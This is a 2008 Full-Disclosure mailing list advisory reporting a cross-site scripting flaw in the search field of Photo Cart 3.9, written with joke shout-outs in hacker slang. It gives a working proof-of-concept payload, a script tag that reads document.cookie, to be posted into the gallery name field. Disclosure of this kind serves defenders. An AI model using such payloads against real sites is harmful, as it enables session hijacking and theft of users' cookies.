[Full-disclosure] Photo Cart 3.9 index.php "search" XSS
bug squash
bugsquashr at gmail.com
Fri Aug 22 21:38:22 BST 2008
#######################################
Photo Cart 3.9 index.php "search" XSS
#######################################
Author: Tyler Trioxide
Link: http://www.picturespro.com/photocart/index.php
XSS in search functionality
~~~~Ub3r l33t $ploit~~~~:
POST <script>alert(document.cookie)</script> to "Gallery or event name" field
dooooomed!
sHoUtZ:
Fatback Mac and the BBQ gang, d00m3d! Chik3n hUnT3r 666, T4c0 b3LL
cRu, Hussin X, M4ri4 P, and El Chubacabra's Baby's Mama
Thankz:
Jesus Buddha Mohammad Vishnu Moses Jr.
Full-Disclosure is hosted and sponsored by Secunia.